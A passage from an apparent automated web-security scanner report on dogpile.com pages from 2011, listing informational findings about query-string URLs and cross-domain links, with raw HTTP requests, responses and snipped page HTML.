               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.56. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=200dd588876a457dae8cc16a3af0cb01&ActionId=2115e509ebde427681d2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:21:43 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 5:01:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:01:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:01:43 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="about, about us, metasearch, meta search, metasearch study, search engine, search, google,yahoo, bing, dogpile, dogpile.com, infospace"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="dpInfoGraphicContainer">
                   <img alt="Metasearch study" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true" />
                   <div id="dpInfoGraphicMarkup">
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=add43ab634204f868189c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:56 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:55 GMT
Connection: close
Content-Length: 64453
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.58. http://www.dogpile.com/dogpile_rss/ws/index/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/index/?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=50b69dc71f5b4e528b29c16a3af0cb01&ActionId=e35e7644240d4a61a75ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:12 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.59. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_rss/ws/index/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6ef7bf53e7624ebe9810c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:41 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:41 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:40 GMT
Connection: close
Content-Length: 45831
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



